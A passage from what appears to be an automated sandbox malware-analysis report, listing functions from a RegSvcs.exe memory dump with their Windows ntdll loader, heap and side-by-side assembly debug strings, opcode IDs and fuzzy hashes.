                                                                  • Opcode ID: 71987d99058bb14b176d2a744a3a2f84366b18ebf601a3246f167d5c3b69aecd
                                                                  • Instruction ID: 5e8fd23b264cac80f9e4b57ff15bb55df8a5dc493e0fddd517432a5a19bd9c81
                                                                  • Opcode Fuzzy Hash: 71987d99058bb14b176d2a744a3a2f84366b18ebf601a3246f167d5c3b69aecd
                                                                  • Instruction Fuzzy Hash: BE51B0712483019BD720EF28DC85AAB77E5EF84B58F104A1DE98697250DB30E945CB92
                                                                  Function 016C2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • RtlGetAssemblyStorageRoot, xrefs: 01702160, 0170219A, 017021BA
                                                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0170219F
                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01702180
                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 017021BF
                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01702178
                                                                  • SXS: %s() passed the empty activation context, xrefs: 01702165
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                  • API String ID: 0-861424205
                                                                  • Opcode ID: a09570bc449139b28e2a02bbb73d921bc03d867b327e36b4d168d350194b2989
                                                                  • Instruction ID: 132e573ce2f3aba20076f68583a62880f5407a9444cf6b61561e93cac84e0fc5
                                                                  • Opcode Fuzzy Hash: a09570bc449139b28e2a02bbb73d921bc03d867b327e36b4d168d350194b2989
                                                                  • Instruction Fuzzy Hash: 69313976B40325B7F7229B998C99F7BBBB9EB64E40F05006DFE05A7241D3709E01C6A1
                                                                  Function 016CC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 01708181, 017081F5
                                                                  • LdrpInitializeProcess, xrefs: 016CC6C4
                                                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 017081E5
                                                                  • LdrpInitializeImportRedirection, xrefs: 01708177, 017081EB
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 016CC6C3
                                                                  • Loading import redirection DLL: '%wZ', xrefs: 01708170
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                  • API String ID: 0-475462383
                                                                  • Opcode ID: d5ea72b3ca6c77bd7e3d7db883ba6a396e724c5c4583f02cff6063621dd034ad
                                                                  • Instruction ID: 692c695c7cc68b79756aefcdb935875566340c9a9bb02f34f1deefbe49f38f38
                                                                  • Opcode Fuzzy Hash: d5ea72b3ca6c77bd7e3d7db883ba6a396e724c5c4583f02cff6063621dd034ad
                                                                  • Instruction Fuzzy Hash: 7931F271A443069BD320EF29DD86E2ABBD5EF94B24F00055CF945AB391EA20EC05C7A6
                                                                  Function 016D096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 016D2DF0: LdrInitializeThunk.NTDLL ref: 016D2DFA
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 016D0BA3
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 016D0BB6
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 016D0D60
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 016D0D74
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 1404860816-0
                                                                  • Opcode ID: 2d753f4c28dbd283bafecb177c347ddd7831bbe180355c8fa4fff38e6bedf7cd
                                                                  • Instruction ID: f2a013172ff6f02180fc1bd2afe9a1b0de1a8c828fba770d5e6bfed90326de6c
                                                                  • Opcode Fuzzy Hash: 2d753f4c28dbd283bafecb177c347ddd7831bbe180355c8fa4fff38e6bedf7cd
                                                                  • Instruction Fuzzy Hash: 04424B71900715DFDB21CF68C880BAAB7F5FF44314F1445AAE989DB242E770AA85CF61
                                                                  Function 0169A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                  • API String ID: 0-379654539
                                                                  • Opcode ID: d4dc65836bedb653c62b33aecf309268e3b50d553fe34685008fe124afdb4a66
                                                                  • Instruction ID: 749931eb6261348640c2b407ede81ec08aecd34aaacbc5cf0d643c41de7af8df
                                                                  • Opcode Fuzzy Hash: d4dc65836bedb653c62b33aecf309268e3b50d553fe34685008fe124afdb4a66
                                                                  • Instruction Fuzzy Hash: 8DC16A752083828FDB11CF98C944B6AB7E8BF85704F04896EF9958B351E734C94ACB96
                                                                  Function 016C8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • @, xrefs: 016C8591
                                                                  • LdrpInitializeProcess, xrefs: 016C8422
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 016C8421
                                                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 016C855E
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-1918872054
                                                                  • Opcode ID: 76320e8989c944d7fba35a92e53166abb3ce6048acb1c833d1a4863b1409d728
                                                                  • Instruction ID: 714d31a616b18ef640033cb4663cfc3121274dedff62d008f77492ff368bbc47
                                                                  • Opcode Fuzzy Hash: 76320e8989c944d7fba35a92e53166abb3ce6048acb1c833d1a4863b1409d728
                                                                  • Instruction Fuzzy Hash: 84918A71508345AFD722DF25CC90EBBBAEDFF94A44F80492EFA8593151E370D9048B66
                                                                  Function 016C273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • .Local, xrefs: 016C28D8
                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 017022B6
                                                                  • SXS: %s() passed the empty activation context, xrefs: 017021DE
                                                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 017021D9, 017022B1
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                  • API String ID: 0-1239276146
                                                                  • Opcode ID: f33e596360faaadf857379c44807179d295bd67df737b9158e8ecdc5f50c7f04
                                                                  • Instruction ID: d045228b009423438bfefef9461f787b3490ba2d06159391d6fb68485aba41b7
                                                                  • Opcode Fuzzy Hash: f33e596360faaadf857379c44807179d295bd67df737b9158e8ecdc5f50c7f04
                                                                  • Instruction Fuzzy Hash: F1A19932900229DBDB21CFA9CC98BA9B3B5FB58714F2541EDD908A7351D7309E81CF94
                                                                  Function 016C4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01703456
                                                                  • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01703437
                                                                  • RtlDeactivateActivationContext, xrefs: 01703425, 01703432, 01703451
                                                                  • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0170342A
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                  • API String ID: 0-1245972979
                                                                  • Opcode ID: e5474a851907876c840b094147414684e23eb035b2b8231354c9f027358fdc21
                                                                  • Instruction ID: 9b2799c9c90329e3a303d5df7e94290c37569e089bf985a06e3a287fd181c3a9
                                                                  • Opcode Fuzzy Hash: e5474a851907876c840b094147414684e23eb035b2b8231354c9f027358fdc21
                                                                  • Instruction Fuzzy Hash: ED61DB36640B129FD722CE1CCC91B3AF7E5EB80A60F16856DF9569F290DB30E801CB95
                                                                  Function 016964AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 016F0FE5
                                                                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 016F10AE
                                                                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 016F1028
                                                                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 016F106B
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                  • API String ID: 0-1468400865
                                                                  • Opcode ID: ea9a23d2a217c6b91e1c48f2ae5f42c124ba972bd3e7c65a5b6242fe32f11f44
                                                                  • Instruction ID: 9f8af91910f36bbd2817b925b2fe4beab870dc8a2b20cc0af4886b793b474e55
                                                                  • Opcode Fuzzy Hash: ea9a23d2a217c6b91e1c48f2ae5f42c124ba972bd3e7c65a5b6242fe32f11f44
                                                                  • Instruction Fuzzy Hash: 9971EDB19043059FCB20EF18CC84B9B7BADAF95764F40456CF9498B28AD734D589CBD2
                                                                  Function 016B245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • LdrpDynamicShimModule, xrefs: 016FA998
                                                                  • apphelp.dll, xrefs: 016B2462
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 016FA9A2
                                                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 016FA992
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-176724104
                                                                  • Opcode ID: 613d2126f76c47d0dc38d33368ce21404de6de444a81bcfea3f90802a960767b
                                                                  • Instruction ID: 9268dca700a3cd38aeec3a275a9a319621abca1225f80436411a789fb84b38eb
                                                                  • Opcode Fuzzy Hash: 613d2126f76c47d0dc38d33368ce21404de6de444a81bcfea3f90802a960767b
                                                                  • Instruction Fuzzy Hash: B0318D71690201EBDB319F9DCC84EAEBBB5FB80B20F25406DFA056B345C770A982C790
                                                                  Function 016A29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • HEAP[%wZ]: , xrefs: 016A3255
                                                                  • HEAP: , xrefs: 016A3264
                                                                  • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 016A327D
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                  • API String ID: 0-617086771
                                                                  • Opcode ID: 672364950cbfa1712afa705715d6f2b98cc28aaf4c6cce93f031a8faed758495
                                                                  • Instruction ID: 1cd5dc9b23ffc7ca206fd2c19d59598e3bd00980fc679977374d79ff0db9bd4b
                                                                  • Opcode Fuzzy Hash: 672364950cbfa1712afa705715d6f2b98cc28aaf4c6cce93f031a8faed758495
                                                                  • Instruction Fuzzy Hash: FA929971A042499FDB25CFA8C8547AABBF1FF08304F58809DE94AAB352D735AD42CF50
                                                                  Function 016A0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                  • API String ID: 0-4253913091
                                                                  • Opcode ID: f3760aaf6bfbc07dc941e1b98f364dc331d7fe36589c1ecfbf6f44391326bc42
                                                                  • Instruction ID: c12ff052d46ff58d482f4eccc2e182e2b30a66b11542089525dd35412283011e
                                                                  • Opcode Fuzzy Hash: f3760aaf6bfbc07dc941e1b98f364dc331d7fe36589c1ecfbf6f44391326bc42
                                                                  • Instruction Fuzzy Hash: C5F19B34A00606DFEB25CF68C894B6ABBB5FF45304F5482A8E5169B396D730ED81CF90
                                                                  Function 016B6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $@
                                                                  • API String ID: 0-1077428164
                                                                  • Opcode ID: 8c292b3093c629f545efcfd3e3ba4d786c42d84cb5234efcc3edc461e6239291
                                                                  • Instruction ID: 87b50d10f3eafd7a649eca1cab6ec1978504c70bc6818805e9c5fb5ffe247898
                                                                  • Opcode Fuzzy Hash: 8c292b3093c629f545efcfd3e3ba4d786c42d84cb5234efcc3edc461e6239291
                                                                  • Instruction Fuzzy Hash: 13C26E71A083559FD725CF28CC81BABBBE5AFC8754F04892DEA8987381D734D885CB52
                                                                  Function 0168A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: FilterFullPath$UseFilter$\??\
                                                                  • API String ID: 0-2779062949
                                                                  • Opcode ID: 1c86db3dc7d1ee8bc19be6178c18af6dbdad30c9dbf9639a057199f89146cbc6
                                                                  • Instruction ID: 0186883dd15d79262ae07372c4694133bf1efb66950b707a742d159e8f267638
                                                                  • Opcode Fuzzy Hash: 1c86db3dc7d1ee8bc19be6178c18af6dbdad30c9dbf9639a057199f89146cbc6
                                                                  • Instruction Fuzzy Hash: CBA19F71D112299BDB31DF68CC98BEAB7B9EF48700F1042EAD909A7210D7359E84CF54
                                                                  Function 016B0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • LdrpCheckModule, xrefs: 016FA117
                                                                  • Failed to allocated memory for shimmed module list, xrefs: 016FA10F
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 016FA121
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-161242083
                                                                  • Opcode ID: 73bd2d5f6caa39eb31d5ec53207111799e5423241c9b656fba04347edd4a9f5b
                                                                  • Instruction ID: 8f7fae0a2866380fdd8accc0c3851a26005a6f237ece47a9cabed8f437bc9c64
                                                                  • Opcode Fuzzy Hash: 73bd2d5f6caa39eb31d5ec53207111799e5423241c9b656fba04347edd4a9f5b
                                                                  • Instruction Fuzzy Hash: 2B71CE71A402059FDB25DFA8CD81ABEBBF5FB44714F24806DE906AB351E734A982CB50
                                                                  Function 016A0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                  • API String ID: 0-1334570610
                                                                  • Opcode ID: 144f49f40484355d701f7a95d195c2b67ec1d4ebc1882f9d9f7b2683edab281c
                                                                  • Instruction ID: 2f50439385bed0803616cb7bea985ebb12afa0d739c959f23ed25a6d36e268b8
                                                                  • Opcode Fuzzy Hash: 144f49f40484355d701f7a95d195c2b67ec1d4ebc1882f9d9f7b2683edab281c
                                                                  • Instruction Fuzzy Hash: D461BD716003019FDB29CF28C980B6ABBE1FF45704F54855DE95A8B396D771EC81CB91
                                                                  Function 016CC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • Failed to reallocate the system dirs string !, xrefs: 017082D7
                                                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 017082DE
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 017082E8
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-1783798831
                                                                  • Opcode ID: a5c7873f99295b52118b1d5d537fed1d3056721c64ebdab1a2b32de13c2dae77
                                                                  • Instruction ID: c046fe4d391440f4d6ddf31e1dfff51569c48983939dc5ff815606a14e0de03c
                                                                  • Opcode Fuzzy Hash: a5c7873f99295b52118b1d5d537fed1d3056721c64ebdab1a2b32de13c2dae77
                                                                  • Instruction Fuzzy Hash: C0410771584301ABC721EB68DC44B6FBBE9EF54B64F10852EF949D7290E770D800CBA6
                                                                  Function 0174C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • PreferredUILanguages, xrefs: 0174C212
                                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0174C1C5
                                                                  • @, xrefs: 0174C1F1
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                  • API String ID: 0-2968386058
                                                                  • Opcode ID: 161ba5e57b672676e39250a11cc1cc8ba8d82f480a46dd35c4f434f22d143206
                                                                  • Instruction ID: 36971d03688b40f10ff2bc8c65a037d35e6cabd24097ee402ef57c312aaca97b
                                                                  • Opcode Fuzzy Hash: 161ba5e57b672676e39250a11cc1cc8ba8d82f480a46dd35c4f434f22d143206
                                                                  • Instruction Fuzzy Hash: A6418571E05219EBDB12DED9CC51FEEFBB9BB14704F00416AE605B7240D7B49A44CB54
                                                                  Function 01724144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                  • API String ID: 0-1373925480
                                                                  • Opcode ID: 3f11ed07691718c521a25e567bdd5a238adf297d44f36110ab78e770a73e5187
                                                                  • Instruction ID: af9829de1c5f913aa99d517c871c9aa6502ac86073813ddc44b1dab13ad4c1df
                                                                  • Opcode Fuzzy Hash: 3f11ed07691718c521a25e567bdd5a238adf297d44f36110ab78e770a73e5187
                                                                  • Instruction Fuzzy Hash: 6A41E232A04268CBEB26DBD9CC44BADFBF9FF56340F240459D902EB781D6748902CB51
                                                                  Function 01714755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 01714899
                                                                  • LdrpCheckRedirection, xrefs: 0171488F
                                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01714888
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                  • API String ID: 0-3154609507
                                                                  • Opcode ID: 263a7e763ec1c27409100992e0987338ec7bee1d988344b7b6d507115c55d2ae
                                                                  • Instruction ID: a2a90a061c74bcba5566225cde3177258fcafd2bfa456a53e2afc609a7dd398a
                                                                  • Opcode Fuzzy Hash: 263a7e763ec1c27409100992e0987338ec7bee1d988344b7b6d507115c55d2ae
                                                                  • Instruction Fuzzy Hash: 2041D272A542519FCB22CE5DD840A26FBE5EF49B60F0905ADED4AE7319D730D800CB91
                                                                  Function 016A0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                  • API String ID: 0-2558761708
                                                                  • Opcode ID: 3baa124d6abc5f00e35d89d7ff213558eabed967615cac4d84798aa54760cfe5
                                                                  • Instruction ID: 34a6406b4e7f820ef15730f69ef65281c3a7b424895732a2e882dcf8c8a11d42
                                                                  • Opcode Fuzzy Hash: 3baa124d6abc5f00e35d89d7ff213558eabed967615cac4d84798aa54760cfe5
                                                                  • Instruction Fuzzy Hash: 4311DC313561029FDB29DE18CC81B6AB3A9EF41B26F18826DF507CB251DB34EC41CB99
                                                                  Function 017120DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • LdrpInitializationFailure, xrefs: 017120FA
                                                                  • Process initialization failed with status 0x%08lx, xrefs: 017120F3
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 01712104
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-2986994758
                                                                  • Opcode ID: e806ce78dd70d00c76247f6f8dae81d34c2c8389a07ebb3834b111bda0b239b0
                                                                  • Instruction ID: cd6812291f533d13909855071b8a850e3b331b974d420989a6736a06112cc490
                                                                  • Opcode Fuzzy Hash: e806ce78dd70d00c76247f6f8dae81d34c2c8389a07ebb3834b111bda0b239b0
                                                                  • Instruction Fuzzy Hash: 26F04C74780308BFE720E60DDC57F99BB68FB41B24F20005DF60077289D5B0E940C641
                                                                  Function 016A03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: ___swprintf_l
                                                                  • String ID: #%u
                                                                  • API String ID: 48624451-232158463
                                                                  • Opcode ID: 9407ebfaab16d493e91f226420a677dd8aaa33b262c1649f8ea64ca5b409bc6f
                                                                  • Instruction ID: e8705d2c0352b8ae47edb28f9ccb1e0b4659c98297a5b0fe0d680097528df435
                                                                  • Opcode Fuzzy Hash: 9407ebfaab16d493e91f226420a677dd8aaa33b262c1649f8ea64ca5b409bc6f
                                                                  • Instruction Fuzzy Hash: 2A712772A0114A9FDB01DFA8CD94BAEB7F9FF08704F144069EA05A7251EB34AD41CBA4
                                                                  Function 0169A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • LdrResSearchResource Enter, xrefs: 0169AA13
                                                                  • LdrResSearchResource Exit, xrefs: 0169AA25
